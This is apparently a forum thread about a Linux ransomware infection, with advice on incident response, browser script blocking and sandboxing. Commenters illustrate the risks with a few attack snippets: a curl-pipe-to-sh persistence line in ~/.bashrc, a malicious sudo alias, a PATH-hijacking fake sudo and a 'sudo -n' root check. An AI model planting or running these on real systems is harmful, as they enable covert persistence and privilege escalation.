It doesn't seem to have been mentioned on the forums, which is alarming, but the correct response to finding out your machine has been owned is to shut it the fuck down. Right away. Then boot up a rescue CD, which will have a known working system (read: not compromised), from which you can do some forensic work to find out how you were owned and what data is recoverable.
Take the data you can recover offline and then reinstall from scratch. Don't try to fix it, just recover what you can and throw the rest away.
> from which you can do some forensic work to find out how you were owned
It's worth noting that if you are really serious about doing forensics and investigating the attack, then shutting down can be pretty destructive: you lose the volatile evidence, like running processes, open network connections, and anything that only lives in RAM.
> what data is recoverable.
Another point I'd make: try to recover as little as possible from the infected system and prefer clean backups instead.
I agree on the overall sentiment though, attempting to recover an infected system is unnecessarily risky. Nuke it from orbit, it's the only way to be sure.
I may be wrong, but these days doesn't malware have a loader (which has a hook in the boot cycle at some point) and a payload (which usually poses as an innocent file tucked away on your system somewhere). Even if you wholesale recover your data and include the payload, there is no loader hooked into your newly-installed system, rendering the payload a digital bullet without a corresponding gun. As far as I'm aware, infecting your MP3s or JPEGs was more something ye olde worms did, no?
Trying to make distinctions like this gets you back to "figuring out how you were owned", i.e. determining the transmission vectors and threats.
The reality is that decoders for complex file formats often have buffer overrun and code execution flaws. If such mechanisms were used in the original attack, or if the malware has worm-like abilities to extend the attack from your compromised machine, then wouldn't it be likely that more such corrupted data is also being staged on your machine?
Also, a very real risk would be the huge number of little scripts and configuration files which offer embedded scripting syntaxes. A naive victim might think they can install a new OS and just "recover their custom configuration files", but they are really recovering the attacker's configuration which can include the actual malware activation or other fail-safe reinfection mechanisms.
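To make that concrete: a single line like the following, slipped into a "recovered" ~/.bashrc, would re-run an attacker's code on every new shell. This is purely illustrative, the URL is made up:

    # hidden near the bottom of a restored ~/.bashrc
    curl -fsSL https://example.invalid/update.sh | sh >/dev/null 2>&1 &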
> In the first demo, I just select the PDF document with one click. This is enough to exploit the vulnerability, because the PDF document is implicitly read to gather extra information.
> In the second demo, I change the view to Thumbnails view. In a thumbnail view, the first page of a PDF document is rendered to be displayed in a thumbnail. Rendering the first page implies reading the PDF document, and hence triggering the vulnerability.
> In the third demo, I use my special PDF document with the malformed stream object in the metadata. When I hover with the mouse cursor over the document (I don’t click), a tooltip will appear with the file properties and metadata. But with my specially crafted PDF document, the vulnerability is triggered because the metadata is read to display the tooltip…
And if you are paranoid, don't wait for a proper shutdown, pull the power plug. Don't bother with the network plug, pull the power plug right away. Some pwners don't like interrupts and have a nice easter egg in the shutdown or network-down procedure, e.g. erasing stuff you might not have backed up (which, I am sure, you have, right?).
> It doesn't seem to have been mentioned on the forums, which is alarming
Really?
>> Best thing to do when dealing with this kind of stuff is disconnect the network, cold reboot off a livecd and go from there.
>> That means that they got root.
You can't clean that up, it's a reinstall. [...]
If you want to do forensics, make a disc image of the install and work on that. You need the filesystem free space too, as that's where the interesting stuff will be.
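Something along these lines, done from the rescue environment (a sketch; the device names are only examples, double-check them before running dd):

    # image the whole compromised disk, free space included, onto an external drive
    dd if=/dev/sda of=/mnt/usb/compromised.img bs=4M conv=noerror,sync status=progress
    # then only ever work on a copy of that image
    cp /mnt/usb/compromised.img /mnt/usb/working-copy.img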
Even better - make sure that everything is under version control or backed up so that in such a situation you can just reinstall from scratch without introducing the possibility of "recovering" infected files.
Why does it matter if Firefox ran as root or not? I agree it's terrible practice in principle. But most people will run Firefox as their ordinary user, which normally has full access to the files in their home directory.
If someone gets arbitrary code execution under your user, they can erase/encrypt your files. Who cares if the OS files are safe. All the data you really care about will be gone.
Agree. An ordinary user is absolutely sufficient.
I'll now present a sophisticated privilege escalation method that most of us won't notice (me included, sarcasm off):
alias sudo='/usr/bin/sudo echo something evil && /usr/bin/sudo'
I don't think it matters that he used his root account.
As an attacker, I test for sudo -n. If it succeeds, I have root. In most cases I do not need it however. SSH key trusts, SSH multiplexing and bad posix permissions are more than enough to get me anywhere and grab anything.
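Roughly this, for the curious (a sketch, not actual tooling):

    # succeeds without prompting if sudo is passwordless or credentials are still cached
    sudo -n true 2>/dev/null && echo "root is free"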
If they have access to your .bashrc they can also alter your PATH and create a script named sudo somewhere they have write access to that carries the malicious payload. So you're not gaining much by adding the quotes.
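For illustration, the PATH variant is only a few lines (paths here are just examples):

    mkdir -p ~/.local/bin
    printf '#!/bin/sh\n# ...malicious payload would run here...\nexec /usr/bin/sudo "$@"\n' > ~/.local/bin/sudo
    chmod +x ~/.local/bin/sudo
    echo 'export PATH="$HOME/.local/bin:$PATH"' >> ~/.bashrc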
There may be things an exploit can do as root that wouldn't work under your user to break out of the adobe flash "sandbox". But yeah, the real recommendation is to get rid of flash and kill it with fire. The security of free software isn't foolproof, but good riddance to that particular closed-source blob from the web.
The whole point of security and good practice is to make it harder for that arbitrary code to be executed (or for whatever other flaws to be exploited, until they're fixed). Running a browser as root is not good practice. Doesn't mean that something bad will happen, but it's more or less like laying the cheese on the ground and expecting mice not to go after it. Even if you have none around, you just shouldn't risk it. At all. Unless you know exactly what you're doing.
This is why I wish people took mandatory access control more seriously. But to make it really pervasive and useful you need something like what Android has, where the file format mandates MAC profiles for the app. Even Red Hat cannot maintain SELinux profiles for every package in every repo, and even then third parties would complain about having to write the profiles just for RHEL / Fedora packages.
It is something the entire ecosystem would have to, at once, agree to make happen, and then standardize mandated MAC profiles in every package format. So basically never.
The title seems fine to me. I knew Linux ransomware was a theoretical possibility, but I didn't know it was out there in the world. Or, as they say, "in the wild".
Stand up an old version of wordpress with poor admin/admin credentials on an external box, and wait a couple of hours. You'll find all sorts of malware on a linux box, ransomware included. Pretty common, though it seems most people who compromise linux machines use them to launch further attacks, not ransomware.
The linux ransomware variants I see all do about the same thing: wipe various /var/log/* logfiles, then encrypt all your mysql dbs, your homedir files, and your webserver docroot.
I'm not sure I agree with your analysis. True, the user ran Firefox as root (which is terrible practice), but they also had the same problems on a different system that never ran firefox:
> Interesting to note that another system, also a sister, seems to have caught the same, and I can't recall ever having run anything but VirtualBox VMs on that one, it's turned off right now until I figure out a recovery plan, so at least 2 systems to recover, and have one clean one to do so from.
That said, it could easily be explained if SSH private keys weren't encrypted (passphrase protected) and allowed an easy hop from infected to sister. And if somebody is running Firefox as root, it doesn't seem too extreme to assume they might have unencrypted private keys...
So it may just be from running Firefox as root, but it's still possible it could be from other things.
> TL;DR: The user ran firefox as root and the attack happened through adobe-flash. Hardly a sophisticated attack.
That has been speculated but far from proven. On the last page they are still talking about the point of entry and how they are in no way convinced it was FF/Flash.
People claim to run noscript but every page calls js from 10 different domains. How on earth do you navigate what to let through and what to block? And at some point, to me, it’s just too many mouse clicks!
You learn with time. And when it's not obvious what to activate and what not, I just close the tab and don't bother with the content.
It can be tedious, but so can waiting for somebody's poorly written javascript to lag your browser.
I started blocking all JS by default for security, but I've actually found it to be a much better user experience as well. You deal with the annoyance of having to whitelist domains, and sure, a lot of SPAs don't work at all until you enable JS for the client-side rendering, but many, many websites work far better: all the content I care about is server-side rendered, and the JS is only there to load ads that disrupt the experience (this is especially true on mobile; for that I highly recommend the Brave browser). You'd be surprised how much better parts of the web get with no JS :-)
> It really has changed the way I use the internet.
I agree so much. I cannot recommend umatrix highly enough. It has put me completely back in control of what sites can and can't do. I block everything by default except for first-party CSS and images (e.g. *.ycombinator.com when I visit news.ycombinator). It's great, and not at all as bothersome as I thought.
No more HTML5 pop-ups, deceptive ads, no more auto loading videos, no more sneaky audio, no more weird javascript that slows my browser to a crawl, no more tracking.
On my laptop, I block all images by default, while I don't on my desktop (like you, I load CSS and images there).
I find myself more and more liking to use my laptop for browsing, which makes me think I could block images by default on my desktop as well and rarely ever notice it anymore.
Running NoScript is a real eye-opener, even if you don't stick with it, because the amount of bullshit that is pulled down from visiting a common website is incredible.
On my Linux desktop, I run firefox with uMatrix and if a page isn't readable without javascript then I don't bother, except a very few handful of sites that are whitelisted. If it's content that I really feel like I need to see, then I run chromium with just an ad blocker. They are each run from separate chroot instances, though with firefox container tabs that won't be as necessary anymore maybe.
On my macbook, I run Safari with no loading of JS or images at all, and firefox with uMatrix again. And again, if a page isn't readable without JS, then I don't read it, or I wait until I can use chromium on my desktop, assuming that I'm not going to allow the scripts in uMatrix, which I usually don't.
On my phone, I run Safari with JS always disabled, which is actually perhaps surprisingly fine for the vast majority of mobile websites.
And I run firefox for iOS with JS enabled if I really really need to look at something that doesn't work on non-JS Safari.
You get used to it. Most JS on the web is junk anyway. I don't have any FOMO by avoiding JS almost entirely, but maybe that's just me (and people like me)?
I run umatrix, and I block everything. Cookies, CSS, images, scripts, media, XHR, etc. Everything, except for CSS and images from the first-party domain (e.g. *.ycombinator.com).
Most sites actually work better with this. They're faster, there's less clutter, no ads, less risk. Some need a little convincing by unblocking some CSS or images. Umatrix makes this super easy. If a site requires javascript to run, I just skip that content. It's different for web apps like trello or github of course. Those get much more permissions.
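For reference, my ruleset boils down to something like this (uMatrix's "My rules" syntax, from memory, so treat the exact lines as approximate):

    * * * block
    * 1st-party css allow
    * 1st-party image allow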
> How on earth do you navigate what to let through and what to block?
umatrix gives a nice matrix (duh) that shows exactly what's trying to load. I don't often need to unblock things, but when I do, it's usually obvious right away. Takes maybe two clicks. Worth the effort IMHO
I use the built-in script blocking in Chrome; it's fairly quick to whitelist any scripts I actually want to run. It's by domain though, so not really perfect. I also block ad servers at the DNS level, and run an ad blocker. Until recently I didn't need the blocker, but ad networks have gotten better at serving from legitimate hosts, so I can't just block them anymore.
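For anyone wanting to try the DNS-level blocking, the lowest-effort version is the classic hosts-file trick (the domains below are just examples):

    # appended to /etc/hosts
    0.0.0.0 doubleclick.net
    0.0.0.0 adservice.google.com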
There are lots of services I would be glad to outright pay for, or have some sort of flattr-type service attached to. I don't feel one iota guilty for blocking ads, given the risks and costs.
It's an endeavor worth the time, trust me. Whitelisting carefully over time enhances the browsing experience. You're right that some sites go overboard on off-domain JS calls, but I choose to just get that content elsewhere. It's time people were pickier about this stuff and pushed back more on the companies.
Not trying to blame the user, just trying to understand: why would someone ever run a web browser as root? A text editor to edit system files, ok, but a browser?
Seeing as the user's main problem is that their home directory was encrypted, root doesn't seem like it would have made any difference...
Better would be easier ways to run browsers (and all applications) inside protected systems of some kind, so that even if they are hacked they can't touch anything outside their own cache directory and the files they deliberately download.
You're describing a sandbox. You run the security-vulnerable routine inside a separate process and give this process the most minimal read/write-permissions that the routine can still work with.
Flash itself has been sandboxed inside Firefox's Plugin Container since forever and Firefox is getting a sandbox around tabs as we speak.
But you can break out of sandboxes. By either exploiting a bug in the OS that bypasses process permissions or by finding a hole in the sandbox that allows you to do things.
I imagine, for example, if you want to upload a file, then the tab-process has to talk to the less restricted main-Firefox-process, which has to then open up a file-chooser dialog and give control to the user.
But it could for example be possible to somehow malform this request to the main-Firefox-process, so that the file-chooser crashes and just hands over a random file, before the user has even seen the dialog. (Obviously, I'm not going to come up with an actual security vulnerability on the spot here.)
This kind of vulnerability can't be fixed with a sandbox. You need some way to upload files, for which you'll need filesystem access in some way and to pretty much the entire Home-directory.
Theoretically, you could require the user to copy the file into a separate "Upload"-directory and then only have read-permissions to that directory, but that's hardly user-friendly and would probably end up with some users keeping their entire Home-directory underneath that Upload-directory.
Hmm... I half expected this to be a joke and the post about how they had to compile it themselves and were trying to get the dependencies squared away.
Friends don't let friends run Flash. Does Gentoo have Firejail readily available? That would have prevented this, I'm pretty sure.
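If it's packaged (sys-apps/firejail, last I checked), the invocation is about as simple as it gets. A rough sketch, if I remember the defaults right:

    firejail firefox                     # default profile blocks sensitive dotfiles like ~/.ssh
    firejail --private=~/browse firefox  # or give it its own home directory (which has to exist already)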
Hadn't thought of it before but it might be an idea to run my browser (Firefox, Kubuntu 17.04) under a separate user that doesn't have access to my main user files.
Might be simplest to just create a user through the DE, then "su -c" from my main user to run the browser?
I currently run my kids browsers under my user by doing "xhost +local:; su -l -c /usr/bin/firefox $USERNAME" where USERNAME is the kids login. I may have made changes to enable that, don't recall sorry.
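A slightly tighter variant of the same idea (usernames are placeholders, untested on my side) would be to grant X access only to that one user instead of everything local, and start the browser via sudo:

    xhost +SI:localuser:kidsuser
    sudo -u kidsuser -i firefox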
Another option would be a sandboxing system like xdg-app. AFAIK, there's already an xdg-app release of LibreOffice, and an experimental xdg-app build of Firefox.
And, of course, there's always the paranoid option of "run the browser within a virtual machine", so an attacker would have to break the browser, then get local root within the VM, and finally find an exploit for the VM, before getting to your files.
Uploading files would become a chore, as you'd always have to copy them over from your actual Home-directory to that Firefox-user's, but yeah, it would add another thick layer that attackers would have to get through.
Mind that Firefox is also getting sandboxed tabs as we speak, so yet another layer that attackers would have to get through, which wasn't in place at the time of this attack.
There is a trend of insecurity/vulnerabilities that seems to be gaining speed in recent months. Not trying to sound ominous, and there's nothing to really point a finger at, but it seems like a thing.
For a few months now I've done almost all my browsing in a carefully configured w3m. No javascript at all of course and certainly no flash. I am typing this in vim, which is set as the default form editor in w3m for me.
Edit: if you are wondering whether w3m can work well, try looking at HN using w3m, it's a real beauty.
That is one of the reasons I am thinking about having /home on NILFS2 ([1] a log-structured file system) in my dabbling with my own Linux distribution. When you have constant snapshots, ransomware can't do much, can it?
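In case it helps, getting at an old state on NILFS2 is roughly this, going by the nilfs-utils docs (device and checkpoint number are just examples):

    lscp /dev/sdb1                                       # list existing checkpoints
    chcp ss /dev/sdb1 1234                               # promote checkpoint 1234 to a protected snapshot
    mount -t nilfs2 -r -o cp=1234 /dev/sdb1 /mnt/snap    # browse the pre-ransomware state read-only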
Depends on what permissions it has. If it runs as root, it probably could delete/mess up snapshots. Whether it's going to do so, especially for non-mainstream filesystems, is another question.
Only if the snapshots are read-only and/or invisible by default; some systems expose snapshots as additional directories under some mountpoint, in which case they just get encrypted as well.
Yes, I got hit by this on two separate machines in June or so, they'll break into one, steal all the SSH keys and look through your history looking for more machines to break into. It sucks ass. I suspect that my breakin was because of an outdated Wordpress installation I kept around.
This malware is super thorough and super obnoxious. Keep your machines up-to-date.